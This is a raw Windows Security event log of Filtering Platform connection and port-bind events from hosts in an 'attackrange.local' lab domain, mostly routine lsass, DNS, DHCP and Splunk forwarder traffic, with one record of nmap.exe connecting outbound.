OpCode=Info
RecordNumber=887318
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: ::
Source Port: 1286
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887317
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.148.0.0
Source Port: 0
Destination Address: 112.105.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887331
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63912
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887341
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887340
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887339
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887338
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887337
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887336
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887335
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887334
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278975
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53932
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887333
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1288
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887332
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1288
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278976
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53933
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:39 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887343
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1289
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:39 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887342
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1289
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887347
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887346
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: fe80::ffff:ffff:fffe
Source Port: 135
Destination Address: ff02::1:ff00:4c4f
Destination Port: 0
Protocol: 58
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887345
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887344
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 70370
Layer Name: Connect
Layer Run-Time ID: 48